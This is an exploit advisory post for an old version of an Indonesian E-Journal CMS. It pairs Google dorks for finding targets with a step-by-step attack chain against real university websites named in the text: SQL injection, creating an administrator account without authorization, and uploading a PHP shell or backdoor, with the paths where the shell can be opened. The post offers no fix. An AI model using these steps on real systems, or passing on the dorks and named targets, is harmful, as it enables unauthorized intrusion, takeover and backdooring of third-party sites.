E-Journal (Old Version) Multiple Vulnerabilities

2014-12-16 19:07:31
Posted by: tafaz

==========================================================================================
E-Journal (Old Version) Multiple Vulnerabilities
==========================================================================================

:-------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : E-Journal (Old Version) Multiple Vulnerabilities
: # Date : 17th December 2014
: # Author : X-Cisadane
: # CMS Developer : http://simlitabmas.dikti.go.id/ejournal/
: # Version : Old Version
: # CMS Language : Indonesian
: # Category : Web Applications
: # Vulnerability : SQL Injection, Privilege Escalation and File Upload Vulnerability
: # Tested On : Google Chrome Version 39.0.2171.95 m (Windows 7 Ultimate 32-Bit English)
: # Greetz to : X-Code YogyaFree, Explore Crew, CodeNesia, Bogor Hackers Community, Tomi Zaoldyeck and Winda Utari
:-------------------------------------------------------------------------------------------------------------------------:

DORKS (How to find the target) :
================================
inurl:mahasiswa.php intitle:E-Journal
inurl:dosen.php intitle:E-Journal
inurl:jurnal.php intitle:E-Journal
inurl:dokumen.php intitle:E-Journal
"Karya Tulis Mahasiswa" intitle:E-Journal
"Design & Programming by" intitle:E-Journal
"E-Journal adalah aplikasi berbasis web untuk"
Or use your own Google Dorks :)

P.S : This E-Journal CMS has 2 versions, The Old Version doesn't have informasi.php (Informasi Menu).

Proof of Concept
================

[ 1 ] SQL Injection
POC :
http://[Site]/[Path]/jurnal.php?detail=jurnal&id=['SQLi]

Example :
http://e-journal.uniga.ac.id/jurnal.php?detail=jurnal&id='133
http://www.ejournal-fkipunibba.com/jurnal.php?detail=jurnal&id='133
http://e-journal.uika-bogor.ac.id/jurnal.php?detail=jurnal&id='133
http://ejurnal.unjani.ac.id/jurnal.php?detail=jurnal&id='133
http://ejournal.stikesborromeus.ac.id/jurnal.php?detail=jurnal&id='133
...etc...

[ 2 ] Privilege Escalation
You can create a new Administrator Account by Using this Trick.
For Example my Target is : http://www.ejournal-fisipunla.com/

Step 1 : Add data.php?tambah=dosen in the URL
So in this case the URL was http://www.ejournal-fisipunla.com/data.php?tambah=dosen

Step 2 : Then you can see this notice : "ANDA TIDAK BERHAK MENGAKSES HALAMAN INI. SILAHKAN ANDA LOGIN SEBAGAI ADMINISTRATOR".
Ignore that Notice and click Admin Menu.
Screenshot #1 : http://i59.tinypic.com/54he2b.png

Step 3 : Tadaaa... Now you can add an Administrator Account.
Screenshot #2 : http://i59.tinypic.com/2i8vyus.png

[ 3 ] Upload PHP File (PHP Shell / Backdoor)
After New Administrator Account was Created, you can logon as an Administrator and Upload a Php File.

Admin Control Panel Path : http://[Site]/[Path]/admin.php
Example : http://www.ejournal-fisipunla.com/admin.php

Then Upload your PHP Shell / Backdoor from http://[Site]/[Path]/data.php?tambah=dosen
Upload your Php File in the File and Cover form.
Screenshot #3 : http://i59.tinypic.com/24cxhrc.png

Open your Backdoor / PHP Shell in :
http://[Site]/[Path]/cover/your php file name.php
http://[Site]/[Path]/file/your php file name.php

Fixes

No fixes

In order to submit a new fix you need to be registered.